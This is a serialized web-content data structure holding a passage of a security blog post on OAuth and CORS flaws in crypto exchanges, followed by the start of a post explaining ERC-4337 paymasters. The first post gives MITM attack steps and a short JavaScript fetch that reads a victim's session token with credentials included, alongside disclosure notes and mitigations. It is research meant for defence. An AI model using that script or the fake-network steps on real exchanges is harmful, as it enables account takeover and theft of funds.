"type":28,"tag":116,"props":101226,"children":101227},{"style":266},[101228],{"type":33,"value":70714},{"type":28,"tag":116,"props":101230,"children":101231},{"style":370},[101232],{"type":33,"value":373},{"type":28,"tag":116,"props":101234,"children":101235},{"style":376},[101236],{"type":33,"value":1129},{"type":28,"tag":116,"props":101238,"children":101239},{"style":266},[101240],{"type":33,"value":2830},{"type":28,"tag":116,"props":101242,"children":101244},{"class":245,"line":101243},66,[101245],{"type":28,"tag":116,"props":101246,"children":101247},{"style":266},[101248],{"type":33,"value":3025},{"type":28,"tag":29,"props":101250,"children":101251},{},[101252],{"type":33,"value":101253},"We also reported this vulnerability to the Web3Auth mobile SDK, Slush Wallet, Kukai Wallet, and several other web3 platforms. As mentioned earlier, this issue could have allowed account takeover with zero user interaction if the user had installed an application that exploited the localhost redirect.",{"type":28,"tag":29,"props":101255,"children":101256},{},[101257],{"type":33,"value":101258},"Each team responded promptly, communicated clearly, and shipped fixes quickly. Their diligence set a strong example for coordinated response and helped ensure user security across the ecosystem.",{"type":28,"tag":75,"props":101260,"children":101262},{"id":101261},"how-to-mitigate",[101263],{"type":33,"value":101264},"How to Mitigate",{"type":28,"tag":29,"props":101266,"children":101267},{},[101268],{"type":33,"value":101269},"The proper way to mitigate this issue is to disallow localhost in the live environment. Developers should have a separate staging OAuth environment with a different client ID for testing purposes. It's important to ensure that tokens generated using the test client ID are not valid in the live environment.",{"type":28,"tag":63,"props":101271,"children":101273},{"id":101272},"exploiting-cors",[101274],{"type":33,"value":101275},"Exploiting CORS",{"type":28,"tag":29,"props":101277,"children":101278},{},[101279],{"type":33,"value":101280},"Another bug we found during our research was related to CORS misconfiguration and how different browsers handle mixed content requests.",{"type":28,"tag":29,"props":101282,"children":101283},{},[101284,101286,101292],{"type":33,"value":101285},"While checking for other bugs in exchanges, we found a CORS (Cross-Origin Resource Sharing) configuration allowing credentials and ",{"type":28,"tag":98,"props":101287,"children":101289},{"className":101288},[],[101290],{"type":33,"value":101291},"http://",{"type":33,"value":101293}," schema for any subdomain:",{"type":28,"tag":234,"props":101295,"children":101299},{"className":101296,"code":101297,"language":101298,"meta":7,"style":7},"language-http shiki shiki-themes slack-dark","HTTP 200 OK\nAccess-Control-Allow-Origin: http://aa.exchange.com\nAccess-Control-Allow-Credentials: true\n[...]\n","http",[101300],{"type":28,"tag":98,"props":101301,"children":101302},{"__ignoreMap":7},[101303,101311,101319,101327],{"type":28,"tag":116,"props":101304,"children":101305},{"class":245,"line":246},[101306],{"type":28,"tag":116,"props":101307,"children":101308},{},[101309],{"type":33,"value":101310},"HTTP 200 OK\n",{"type":28,"tag":116,"props":101312,"children":101313},{"class":245,"line":256},[101314],{"type":28,"tag":116,"props":101315,"children":101316},{},[101317],{"type":33,"value":101318},"Access-Control-Allow-Origin: http://aa.exchange.com\n",{"type":28,"tag":116,"props":101320,"children":101321},{"class":245,"line":293},[101322],{"type":28,"tag":116,"props":101323,"children":101324},{},[101325],{"type":33,"value":101326},"Access-Control-Allow-Credentials: true\n",{"type":28,"tag":116,"props":101328,"children":101329},{"class":245,"line":361},[101330],{"type":28,"tag":116,"props":101331,"children":101332},{},[101333],{"type":33,"value":9986},{"type":28,"tag":75,"props":101335,"children":101337},{"id":101336},"cors-misconfiguration-by-lack-of-tls",[101338],{"type":33,"value":101339},"CORS Misconfiguration by Lack of TLS",{"type":28,"tag":29,"props":101341,"children":101342},{},[101343,101345,101351],{"type":33,"value":101344},"This case requires specific preconditions. The idea is to redirect the user to an insecure subdomain of ",{"type":28,"tag":98,"props":101346,"children":101348},{"className":101347},[],[101349],{"type":33,"value":101350},"exchange.com",{"type":33,"value":101352}," and spoof the response by intercepting and tampering with the victim's network packets.",{"type":28,"tag":29,"props":101354,"children":101355},{},[101356],{"type":33,"value":101357},"However, while testing it by simulating an MITM attack, we figured out that this type of attack behaves differently amongst the main browsers:",{"type":28,"tag":2108,"props":101359,"children":101360},{},[101361,101381],{"type":28,"tag":459,"props":101362,"children":101363},{},[101364,101366,101371,101373,101379],{"type":33,"value":101365},"Chrome --> won't work because cookies are not sent in ",{"type":28,"tag":98,"props":101367,"children":101369},{"className":101368},[],[101370],{"type":33,"value":101291},{"type":33,"value":101372}," --> ",{"type":28,"tag":98,"props":101374,"children":101376},{"className":101375},[],[101377],{"type":33,"value":101378},"https://",{"type":33,"value":101380}," requests, even if same-site",{"type":28,"tag":459,"props":101382,"children":101383},{},[101384,101386],{"type":33,"value":101385},"Firefox and Safari --> works since cookies are sent from an insecure context ",{"type":28,"tag":98,"props":101387,"children":101389},{"className":101388},[],[101390],{"type":33,"value":37388},{"type":28,"tag":75,"props":101392,"children":101394},{"id":101393},"exploit-1",[101395],{"type":33,"value":99725},{"type":28,"tag":29,"props":101397,"children":101398},{},[101399],{"type":33,"value":101400},"To exploit it, we must follow some steps:",{"type":28,"tag":455,"props":101402,"children":101403},{},[101404,101409,101414],{"type":28,"tag":459,"props":101405,"children":101406},{},[101407],{"type":33,"value":101408},"Force the victim to enter an insecure webpage in the exchange subdomain",{"type":28,"tag":459,"props":101410,"children":101411},{},[101412],{"type":33,"value":101413},"Deliver the malicious script to the victim using MITM (Man-In-The-Middle)",{"type":28,"tag":459,"props":101415,"children":101416},{},[101417,101419,101424],{"type":33,"value":101418},"Use ",{"type":28,"tag":98,"props":101420,"children":101422},{"className":101421},[],[101423],{"type":33,"value":37388},{"type":33,"value":101425}," with CORS to do something malicious using the victim's account",{"type":28,"tag":29,"props":101427,"children":101428},{},[101429],{"type":33,"value":101430},"To exploit the CORS issue, an attacker must first get the victim to load an insecure subdomain. This can be achieved through techniques such as spoofing Wi-Fi or creating a fake public network that automatically opens the insecure page as the captive portal.",{"type":28,"tag":29,"props":101432,"children":101433},{},[101434,101436,101441],{"type":33,"value":101435},"Once the redirect to the ",{"type":28,"tag":98,"props":101437,"children":101439},{"className":101438},[],[101440],{"type":33,"value":101291},{"type":33,"value":101442}," website is made, if the attacker is in an adjacent network, it is possible to intercept the HTTP request/response (or DNS resolve) and tamper with the returning page. The returning page should have a malicious script that exploits the CORS misconfiguration:",{"type":28,"tag":234,"props":101444,"children":101446},{"className":31015,"code":101445,"language":31017,"meta":7,"style":7},"(async () => {\n  let res = await fetch('https://www.exchange.com/api/session_token', {\n    credentials: 'include',\n    method: 'POST',\n  });\n  console.log(await res.json());\n})();\n",[101447],{"type":28,"tag":98,"props":101448,"children":101449},{"__ignoreMap":7},[101450,101473,101510,101527,101544,101551,101592],{"type":28,"tag":116,"props":101451,"children":101452},{"class":245,"line":246},[101453,101457,101461,101465,101469],{"type":28,"tag":116,"props":101454,"children":101455},{"style":266},[101456],{"type":33,"value":313},{"type":28,"tag":116,"props":101458,"children":101459},{"style":376},[101460],{"type":33,"value":35771},{"type":28,"tag":116,"props":101462,"children":101463},{"style":266},[101464],{"type":33,"value":39316},{"type":28,"tag":116,"props":101466,"children":101467},{"style":376},[101468],{"type":33,"value":1286},{"type":28,"tag":116,"props":101470,"children":101471},{"style":266},[101472],{"type":33,"value":1291},{"type":28,"tag":116,"props":101474,"children":101475},{"class":245,"line":256},[101476,101480,101485,101489,101493,101497,101501,101506],{"type":28,"tag":116,"props":101477,"children":101478},{"style":376},[101479],{"type":33,"value":7527},{"type":28,"tag":116,"props":101481,"children":101482},{"style":272},[101483],{"type":33,"value":101484}," res",{"type":28,"tag":116,"props":101486,"children":101487},{"style":370},[101488],{"type":33,"value":2226},{"type":28,"tag":116,"props":101490,"children":101491},{"style":260},[101492],{"type":33,"value":35837},{"type":28,"tag":116,"props":101494,"children":101495},{"style":282},[101496],{"type":33,"value":32564},{"type":28,"tag":116,"props":101498,"children":101499},{"style":266},[101500],{"type":33,"value":313},{"type":28,"tag":116,"props":101502,"children":101503},{"style":563},[101504],{"type":33,"value":101505},"'https://www.exchange.com/api/session_token'",{"type":28,"tag":116,"props":101507,"children":101508},{"style":266},[101509],{"type":33,"value":48503},{"type":28,"tag":116,"props":101511,"children":101512},{"class":245,"line":293},[101513,101518,101523],{"type":28,"tag":116,"props":101514,"children":101515},{"style":272},[101516],{"type":33,"value":101517},"    credentials:",{"type":28,"tag":116,"props":101519,"children":101520},{"style":563},[101521],{"type":33,"value":101522}," 'include'",{"type":28,"tag":116,"props":101524,"children":101525},{"style":266},[101526],{"type":33,"value":3178},{"type":28,"tag":116,"props":101528,"children":101529},{"class":245,"line":361},[101530,101535,101540],{"type":28,"tag":116,"props":101531,"children":101532},{"style":272},[101533],{"type":33,"value":101534},"    method:",{"type":28,"tag":116,"props":101536,"children":101537},{"style":563},[101538],{"type":33,"value":101539}," 'POST'",{"type":28,"tag":116,"props":101541,"children":101542},{"style":266},[101543],{"type":33,"value":3178},{"type":28,"tag":116,"props":101545,"children":101546},{"class":245,"line":387},[101547],{"type":28,"tag":116,"props":101548,"children":101549},{"style":266},[101550],{"type":33,"value":97808},{"type":28,"tag":116,"props":101552,"children":101553},{"class":245,"line":400},[101554,101559,101563,101568,101572,101576,101580,101584,101588],{"type":28,"tag":116,"props":101555,"children":101556},{"style":272},[101557],{"type":33,"value":101558},"  console",{"type":28,"tag":116,"props":101560,"children":101561},{"style":266},[101562],{"type":33,"value":141},{"type":28,"tag":116,"props":101564,"children":101565},{"style":282},[101566],{"type":33,"value":101567},"log",{"type":28,"tag":116,"props":101569,"children":101570},{"style":266},[101571],{"type":33,"value":313},{"type":28,"tag":116,"props":101573,"children":101574},{"style":260},[101575],{"type":33,"value":1091},{"type":28,"tag":116,"props":101577,"children":101578},{"style":272},[101579],{"type":33,"value":101484},{"type":28,"tag":116,"props":101581,"children":101582},{"style":266},[101583],{"type":33,"value":141},{"type":28,"tag":116,"props":101585,"children":101586},{"style":282},[101587],{"type":33,"value":33632},{"type":28,"tag":116,"props":101589,"children":101590},{"style":266},[101591],{"type":33,"value":1577},{"type":28,"tag":116,"props":101593,"children":101594},{"class":245,"line":614},[101595],{"type":28,"tag":116,"props":101596,"children":101597},{"style":266},[101598],{"type":33,"value":101599},"})();\n",{"type":28,"tag":29,"props":101601,"children":101602},{},[101603],{"type":33,"value":101604},"During our research, the misconfiguration we found was in an API with an endpoint to return the session token, so the impact was an account takeover (ATO) with some limitations since exchanges usually have MFA to perform some actions like withdrawing.",{"type":28,"tag":75,"props":101606,"children":101607},{"id":39953},[101608],{"type":33,"value":39956},{"type":28,"tag":29,"props":101610,"children":101611},{},[101612,101614,101619],{"type":33,"value":101613},"As mitigation, it is recommended to remove all ",{"type":28,"tag":98,"props":101615,"children":101617},{"className":101616},[],[101618],{"type":33,"value":101291},{"type":33,"value":101620}," URLs from the CORS configuration, including localhost, since a local web server in a mobile environment can abuse it.",{"type":28,"tag":29,"props":101622,"children":101623},{},[101624],{"type":33,"value":101625},"Also, as additional/alternative remediation, it is possible to configure the HSTS policy to include all subdomains and prevent insecure subdomains from loading in the browser.",{"type":28,"tag":63,"props":101627,"children":101628},{"id":2506},[101629],{"type":33,"value":2509},{"type":28,"tag":29,"props":101631,"children":101632},{},[101633],{"type":33,"value":101634},"In conclusion, our deep dive into authentication and client-side bugs within exchange platforms revealed several vulnerabilities stemming from misconfigurations. These types of attacks show the complexity of securing client-side applications due to the different contexts and environments they can operate in.",{"type":28,"tag":29,"props":101636,"children":101637},{},[101638],{"type":33,"value":101639},"It also demonstrates how development configurations can harm the application's security if they are also used in production. Thus, auditors must always understand in which environments and contexts the application will/can be run in, and ensure that the configurations are not insecure for use in production.",{"type":28,"tag":2516,"props":101641,"children":101642},{},[101643],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":101645},[101646,101651,101656],{"id":99330,"depth":256,"text":99333,"children":101647},[101648,101649,101650],{"id":99341,"depth":293,"text":99344},{"id":99698,"depth":293,"text":99701},{"id":101261,"depth":293,"text":101264},{"id":101272,"depth":256,"text":101275,"children":101652},[101653,101654,101655],{"id":101336,"depth":293,"text":101339},{"id":101393,"depth":293,"text":99725},{"id":39953,"depth":293,"text":39956},{"id":2506,"depth":256,"text":2509},"content:blog:2025-10-16-how-we-broke-exchanges-oauth-misconfigurations.md","blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations.md","blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations",{"_path":101661,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":101662,"description":101663,"date":101664,"author":101665,"image":101666,"isFeatured":19,"onBlogPage":19,"tags":101668,"body":101671,"_type":2534,"_id":107442,"_source":2536,"_file":107443,"_stem":107444,"_extension":2539},"/blog/2025-12-02-paymasters-evm","ERC-4337 Paymasters: Better UX, Hidden Risks","ERC-4337 paymasters unlock powerful UX by abstracting gas costs, but they also add complexity and subtle bugs. Explore some common pitfalls in real-world implementations and learn how to design production-ready paymasters.","2025-12-02T12:00:00.000Z","nicholas",{"src":101667,"width":17,"height":18},"/posts/paymasters-evm/title.png",[101669,101670],"evm","ERC-4337",{"type":25,"children":101672,"toc":107421},[101673,101677,101688,101693,101698,101703,101709,101715,101720,101725,101731,101736,101764,101770,101775,101782,101787,101797,101802,101828,101834,101854,101860,101880,101888,101919,101952,101961,101973,101998,102010,102023,102066,102072,102105,102204,102223,102246,102251,102257,102285,102432,102437,102464,102470,102482,102494,102503,102538,102543,104027,104055,104076,104081,104093,104102,104107,104125,104148,104153,104159,104213,104219,104252,104287,105111,105147,105183,105249,105282,105780,105833,105845,106409,106478,106505,107127,107169,107196,107208,107269,107288,107322,107327,107332,107337,107341,107346,107381,107407,107412,107417],{"type":28,"tag":41,"props":101674,"children":101675},{"id":28670},[101676],{"type":33,"value":28673},{"type":28,"tag":29,"props":101678,"children":101679},{},[101680,101686],{"type":28,"tag":87,"props":101681,"children":101684},{"href":101682,"rel":101683},"https://docs.erc4337.io/",[91],[101685],{"type":33,"value":101670},{"type":33,"value":101687}," (Account Abstraction) has unlocked a new wave of UX improvements for Ethereum. By decoupling users from EOAs (Externally Owned Accounts), it enables smart contract wallets, gas sponsorships, and flexible authentication mechanisms.",{"type":28,"tag":29,"props":101689,"children":101690},{},[101691],{"type":33,"value":101692},"One of the most powerful features introduced by ERC-4337 is the paymaster, a contract that can sponsor gas fees for users. This allows dApps to deliver seamless, “gasless” experiences where users don’t have to hold ETH to transact.",{"type":28,"tag":29,"props":101694,"children":101695},{},[101696],{"type":33,"value":101697},"However, building a correct paymaster isn’t trivial. We’ve seen many developers trip up on subtle details of the standard, which can cause unexpected behavior or unnecessary complexity.",{"type":28,"tag":29,"props":101699,"children":101700},{},[101701],{"type":33,"value":101702},"In this article, we’ll break down how ERC-4337 works at a high level, zoom in on the paymaster’s role, and walk through the most common pitfalls we’ve observed when implementing paymasters. By the end, you’ll have a clear picture of how to design paymasters that follow best practices and are production-ready.",{"type":28,"tag":41,"props":101704,"children":101706},{"id":101705},"erc4337-overview",[101707],{"type":33,"value":101708},"ERC4337 Overview",{"type":28,"tag":63,"props":101710,"children":101712},{"id":101711},"traditional-eoas-vs-smart-contract-wallets",[101713],{"type":33,"value":101714},"Traditional EOAs vs Smart Contract Wallets",{"type":28,"tag":29,"props":101716,"children":101717},{},[101718],{"type":33,"value":101719},"In Ethereum’s early design, user accounts are Externally Owned Accounts (EOAs), controlled by a private key. When you send a transaction (e.g. token transfer or contract call), your private key signs the transaction, and you must pay gas in ETH. If the key is lost or stolen, you lose access to everything permanently. This setup is simple, but also rigid and risky.",{"type":28,"tag":29,"props":101721,"children":101722},{},[101723],{"type":33,"value":101724},"By contrast, smart contract accounts (or \"smart wallets\") are programmable. They can enforce logic like multiple signatures, spending limits, social recovery, batching, and more, automating many aspects of security and usability.",{"type":28,"tag":63,"props":101726,"children":101728},{"id":101727},"why-erc4337-was-introduced",[101729],{"type":33,"value":101730},"Why ERC‑4337 Was Introduced",{"type":28,"tag":29,"props":101732,"children":101733},{},[101734],{"type":33,"value":101735},"Smart wallets offer powerful features, but Ethereum’s protocol restricts transactions to originate only from EOAs. Previous proposals (e.g. EIP‑2938, EIP‑3074) tried to change the protocol itself, requiring a hard fork. ERC‑4337 achieves account abstraction entirely off‑chain, using higher-layer infrastructure without any changes to Ethereum’s consensus layer. This unlocks key UX improvements:",{"type":28,"tag":2108,"props":101737,"children":101738},{},[101739,101744,101749,101754,101759],{"type":28,"tag":459,"props":101740,"children":101741},{},[101742],{"type":33,"value":101743},"User recovery for lost keys (e.g. social recovery)",{"type":28,"tag":459,"props":101745,"children":101746},{},[101747],{"type":33,"value":101748},"Batched or atomic multi-step operations in one flow",{"type":28,"tag":459,"props":101750,"children":101751},{},[101752],{"type":33,"value":101753},"Paying gas fees with ERC‑20 tokens or via sponsor (gasless UX)",{"type":28,"tag":459,"props":101755,"children":101756},{},[101757],{"type":33,"value":101758},"Using custom signature schemes or multisig logic",{"type":28,"tag":459,"props":101760,"children":101761},{},[101762],{"type":33,"value":101763},"Creation and use of smart contract wallets without needing ETH or seed phrase upfront",{"type":28,"tag":63,"props":101765,"children":101767},{"id":101766},"how-erc-4337-works",[101768],{"type":33,"value":101769},"How ERC-4337 Works",{"type":28,"tag":29,"props":101771,"children":101772},{},[101773],{"type":33,"value":101774},"Before diving into each component, let's look at how ERC-4337 works at a high level:",{"type":28,"tag":29,"props":101776,"children":101777},{},[101778],{"type":28,"tag":206,"props":101779,"children":101781},{"alt":50198,"src":101780},"/posts/paymasters-evm/flowchart.png",[],{"type":28,"tag":29,"props":101783,"children":101784},{},[101785],{"type":33,"value":101786},"The diagram above shows the key flow of ERC-4337. Below is a short explanation of each component shown above.",{"type":28,"tag":75,"props":101788,"children":101790},{"id":101789},"useroperation",[101791],{"type":28,"tag":98,"props":101792,"children":101794},{"className":101793},[],[101795],{"type":33,"value":101796},"UserOperation",{"type":28,"tag":29,"props":101798,"children":101799},{},[101800],{"type":33,"value":101801},"A UserOperation is a pseudo‑transaction object representing the user’s intent. It includes data like:",{"type":28,"tag":2108,"props":101803,"children":101804},{},[101805,101810,101815],{"type":28,"tag":459,"props":101806,"children":101807},{},[101808],{"type":33,"value":101809},"Target contract call(s)",{"type":28,"tag":459,"props":101811,"children":101812},{},[101813],{"type":33,"value":101814},"Signature or validation metadata",{"type":28,"tag":459,"props":101816,"children":101817},{},[101818,101820,101826],{"type":33,"value":101819},"Gas limits and fee payment details (wallet address, paymaster, bundler)\n",{"type":28,"tag":98,"props":101821,"children":101823},{"className":101822},[],[101824],{"type":33,"value":101825},"UserOperations",{"type":33,"value":101827}," are submitted to a separate mempool (often called alt‑mempool), not the regular Ethereum transaction pool.",{"type":28,"tag":75,"props":101829,"children":101831},{"id":101830},"smart-contract-account",[101832],{"type":33,"value":101833},"Smart Contract Account",{"type":28,"tag":29,"props":101835,"children":101836},{},[101837,101839,101845,101846,101852],{"type":33,"value":101838},"Often called Sender or Smart Account, this is a user-controlled contract implementing logic via ",{"type":28,"tag":98,"props":101840,"children":101842},{"className":101841},[],[101843],{"type":33,"value":101844},"validateUserOp()",{"type":33,"value":10659},{"type":28,"tag":98,"props":101847,"children":101849},{"className":101848},[],[101850],{"type":33,"value":101851},"executeUserOp()",{"type":33,"value":101853},". It specifies custom rules: signature checking, nonce logic, allowed calls, or spending limits.",{"type":28,"tag":75,"props":101855,"children":101857},{"id":101856},"bundler",[101858],{"type":33,"value":101859},"Bundler",{"type":28,"tag":29,"props":101861,"children":101862},{},[101863,101865,101870,101872,101878],{"type":33,"value":101864},"A Bundler is an off‑chain service or node monitoring the alt‑mempool. It collects multiple ",{"type":28,"tag":98,"props":101866,"children":101868},{"className":101867},[],[101869],{"type":33,"value":101825},{"type":33,"value":101871},", packages them, and submits them in a single transaction to the ",{"type":28,"tag":98,"props":101873,"children":101875},{"className":101874},[],[101876],{"type":33,"value":101877},"EntryPoint",{"type":33,"value":101879}," contract. Bundlers must use an EOA to pay gas upfront and are later reimbursed.",{"type":28,"tag":75,"props":101881,"children":101882},{"id":14389},[101883],{"type":28,"tag":98,"props":101884,"children":101886},{"className":101885},[],[101887],{"type":33,"value":101877},{"type":28,"tag":29,"props":101889,"children":101890},{},[101891,101892,101897,101899,101904,101906,101910,101912,101917],{"type":33,"value":16275},{"type":28,"tag":98,"props":101893,"children":101895},{"className":101894},[],[101896],{"type":33,"value":101877},{"type":33,"value":101898}," contract acts as the central on-chain gateway for ERC-4337. For every batch of ",{"type":28,"tag":98,"props":101900,"children":101902},{"className":101901},[],[101903],{"type":33,"value":101825},{"type":33,"value":101905}," submitted by a ",{"type":28,"tag":4995,"props":101907,"children":101908},{},[101909],{"type":33,"value":101859},{"type":33,"value":101911},", the ",{"type":28,"tag":98,"props":101913,"children":101915},{"className":101914},[],[101916],{"type":33,"value":101877},{"type":33,"value":101918}," validates and routes each operation back to the corresponding Smart Contract Wallet for execution.",{"type":28,"tag":29,"props":101920,"children":101921},{},[101922,101924,101929,101931,101935,101937,101942,101944,101950],{"type":33,"value":101923},"Once all operations have been processed, the ",{"type":28,"tag":98,"props":101925,"children":101927},{"className":101926},[],[101928],{"type":33,"value":101877},{"type":33,"value":101930}," calculates the total gas consumed and reimburses the ",{"type":28,"tag":4995,"props":101932,"children":101933},{},[101934],{"type":33,"value":101859},{"type":33,"value":101936},". This payment can come either directly from the sender's Smart Account deposit in the ",{"type":28,"tag":98,"props":101938,"children":101940},{"className":101939},[],[101941],{"type":33,"value":101877},{"type":33,"value":101943}," or from a ",{"type":28,"tag":98,"props":101945,"children":101947},{"className":101946},[],[101948],{"type":33,"value":101949},"paymaster",{"type":33,"value":101951}," that has agreed to sponsor the transaction.",{"type":28,"tag":75,"props":101953,"children":101954},{"id":101949},[101955],{"type":28,"tag":98,"props":101956,"children":101958},{"className":101957},[],[101959],{"type":33,"value":101960},"Paymaster",{"type":28,"tag":29,"props":101962,"children":101963},{},[101964,101966,101971],{"type":33,"value":101965},"A ",{"type":28,"tag":98,"props":101967,"children":101969},{"className":101968},[],[101970],{"type":33,"value":101949},{"type":33,"value":101972}," is an optional smart contract that enables flexible gas payment options. It can either sponsor gas fees directly or allow users to pay gas using ERC-20 tokens instead of ETH. It runs two key functions:",{"type":28,"tag":2108,"props":101974,"children":101975},{},[101976,101987],{"type":28,"tag":459,"props":101977,"children":101978},{},[101979,101985],{"type":28,"tag":98,"props":101980,"children":101982},{"className":101981},[],[101983],{"type":33,"value":101984},"validatePaymasterUserOp()",{"type":33,"value":101986}," to validate the operation. This can check sponsorship eligibility or verify that the user has sufficient ERC-20 token balance and allowance to cover gas costs. The exact implementation of the function depends on how the protocol implements it.",{"type":28,"tag":459,"props":101988,"children":101989},{},[101990,101996],{"type":28,"tag":98,"props":101991,"children":101993},{"className":101992},[],[101994],{"type":33,"value":101995},"postOp()",{"type":33,"value":101997},", which handles post-execution accounting. For sponsored transactions, this may update internal accounting records, while for token payments, it typically finalizes any accounting related to the ERC-20 token payment.",{"type":28,"tag":29,"props":101999,"children":102000},{},[102001,102003,102008],{"type":33,"value":102002},"By supporting both sponsorship and token-based gas payments, ",{"type":28,"tag":98,"props":102004,"children":102006},{"className":102005},[],[102007],{"type":33,"value":101949},{"type":33,"value":102009}," removes the requirement for users to hold ETH, enabling truly gasless transactions through either model.",{"type":28,"tag":63,"props":102011,"children":102013},{"id":102012},"understanding-the-entrypoints-flow",[102014,102016,102021],{"type":33,"value":102015},"Understanding the ",{"type":28,"tag":98,"props":102017,"children":102019},{"className":102018},[],[102020],{"type":33,"value":101877},{"type":33,"value":102022},"'s Flow",{"type":28,"tag":29,"props":102024,"children":102025},{},[102026,102028,102033,102034,102039,102041,102052,102054,102059,102060,102065],{"type":33,"value":102027},"When a bundler submits ",{"type":28,"tag":98,"props":102029,"children":102031},{"className":102030},[],[102032],{"type":33,"value":101825},{"type":33,"value":16073},{"type":28,"tag":98,"props":102035,"children":102037},{"className":102036},[],[102038],{"type":33,"value":101877},{"type":33,"value":102040}," contract via ",{"type":28,"tag":87,"props":102042,"children":102045},{"href":102043,"rel":102044},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L58",[91],[102046],{"type":28,"tag":98,"props":102047,"children":102049},{"className":102048},[],[102050],{"type":33,"value":102051},"handleOps()",{"type":33,"value":102053},", the processing occurs in two main phases: ",{"type":28,"tag":4995,"props":102055,"children":102056},{},[102057],{"type":33,"value":102058},"Validation",{"type":33,"value":10659},{"type":28,"tag":4995,"props":102061,"children":102062},{},[102063],{"type":33,"value":102064},"Execution",{"type":33,"value":141},{"type":28,"tag":75,"props":102067,"children":102069},{"id":102068},"validation-phase",[102070],{"type":33,"value":102071},"Validation Phase",{"type":28,"tag":29,"props":102073,"children":102074},{},[102075,102077,102082,102084,102090,102092,102098,102099,102104],{"type":33,"value":102076},"In this phase, the ",{"type":28,"tag":98,"props":102078,"children":102080},{"className":102079},[],[102081],{"type":33,"value":101877},{"type":33,"value":102083}," first validates all operations in the submitted ",{"type":28,"tag":98,"props":102085,"children":102087},{"className":102086},[],[102088],{"type":33,"value":102089},"UserOps",{"type":33,"value":102091}," array before executing any of them. This ensures that only valid operations proceed to execution. For each ",{"type":28,"tag":98,"props":102093,"children":102095},{"className":102094},[],[102096],{"type":33,"value":102097},"UserOp",{"type":33,"value":101911},{"type":28,"tag":98,"props":102100,"children":102102},{"className":102101},[],[102103],{"type":33,"value":101877},{"type":33,"value":4160},{"type":28,"tag":455,"props":102106,"children":102107},{},[102108,102126,102144,102165,102177],{"type":28,"tag":459,"props":102109,"children":102110},{},[102111,102118,102120],{"type":28,"tag":87,"props":102112,"children":102115},{"href":102113,"rel":102114},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L764-L777",[91],[102116],{"type":33,"value":102117},"Calculates",{"type":33,"value":102119}," the required prefund amount by summing up all specified gas limits (verification, execution, and paymaster if used) multiplied by the user's specified ",{"type":28,"tag":98,"props":102121,"children":102123},{"className":102122},[],[102124],{"type":33,"value":102125},"maxFeePerGas",{"type":28,"tag":459,"props":102127,"children":102128},{},[102129,102136,102137,102142],{"type":28,"tag":87,"props":102130,"children":102133},{"href":102131,"rel":102132},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L545-L553",[91],[102134],{"type":33,"value":102135},"Calls",{"type":33,"value":6129},{"type":28,"tag":98,"props":102138,"children":102140},{"className":102139},[],[102141],{"type":33,"value":101844},{"type":33,"value":102143}," on the sender's smart account contract to verify the operation's validity (e.g. checking signatures)",{"type":28,"tag":459,"props":102145,"children":102146},{},[102147,102149,102156,102158,102163],{"type":33,"value":102148},"If no paymaster is specified, attempts to ",{"type":28,"tag":87,"props":102150,"children":102153},{"href":102151,"rel":102152},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L554-L557",[91],[102154],{"type":33,"value":102155},"deduct",{"type":33,"value":102157}," the prefund amount from the sender's ETH deposit in the ",{"type":28,"tag":98,"props":102159,"children":102161},{"className":102160},[],[102162],{"type":33,"value":101877},{"type":33,"value":102164}," (this can be partially refunded later if actual execution costs less)",{"type":28,"tag":459,"props":102166,"children":102167},{},[102168,102175],{"type":28,"tag":87,"props":102169,"children":102172},{"href":102170,"rel":102171},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L785-L788",[91],[102173],{"type":33,"value":102174},"Validates",{"type":33,"value":102176}," the nonce to prevent replay attacks",{"type":28,"tag":459,"props":102178,"children":102179},{},[102180,102182,102188,102190,102196,102197,102202],{"type":33,"value":102181},"If a paymaster is specified, it will ",{"type":28,"tag":87,"props":102183,"children":102186},{"href":102184,"rel":102185},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L623-L627",[91],[102187],{"type":33,"value":102155},{"type":33,"value":102189}," the required prefund amount from the paymaster's deposited ETH and then ",{"type":28,"tag":87,"props":102191,"children":102194},{"href":102192,"rel":102193},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L629",[91],[102195],{"type":33,"value":37918},{"type":33,"value":6129},{"type":28,"tag":98,"props":102198,"children":102200},{"className":102199},[],[102201],{"type":33,"value":101984},{"type":33,"value":102203}," on the paymaster contract to verify it will cover gas costs",{"type":28,"tag":29,"props":102205,"children":102206},{},[102207,102209,102214,102216,102221],{"type":33,"value":102208},"Only after all these validation checks pass will the ",{"type":28,"tag":98,"props":102210,"children":102212},{"className":102211},[],[102213],{"type":33,"value":101877},{"type":33,"value":102215}," move on to actually executing the ",{"type":28,"tag":98,"props":102217,"children":102219},{"className":102218},[],[102220],{"type":33,"value":101796},{"type":33,"value":102222},". This strict validation flow ensures that:",{"type":28,"tag":2108,"props":102224,"children":102225},{},[102226,102231,102236,102241],{"type":28,"tag":459,"props":102227,"children":102228},{},[102229],{"type":33,"value":102230},"The operation is legitimate and authorized by the user",{"type":28,"tag":459,"props":102232,"children":102233},{},[102234],{"type":33,"value":102235},"Sufficient funds are available to cover gas (either from user or paymaster)",{"type":28,"tag":459,"props":102237,"children":102238},{},[102239],{"type":33,"value":102240},"The operation cannot be replayed",{"type":28,"tag":459,"props":102242,"children":102243},{},[102244],{"type":33,"value":102245},"All involved contracts (sender and paymaster) have approved the execution",{"type":28,"tag":29,"props":102247,"children":102248},{},[102249],{"type":33,"value":102250},"This multi-layered validation approach is crucial for maintaining security when processing operations that can involve complex smart account logic and third-party gas sponsorship.",{"type":28,"tag":75,"props":102252,"children":102254},{"id":102253},"execution-phase",[102255],{"type":33,"value":102256},"Execution Phase",{"type":28,"tag":29,"props":102258,"children":102259},{},[102260,102262,102267,102269,102276,102278,102283],{"type":33,"value":102261},"After all operations have passed validation, the ",{"type":28,"tag":98,"props":102263,"children":102265},{"className":102264},[],[102266],{"type":33,"value":101877},{"type":33,"value":102268}," 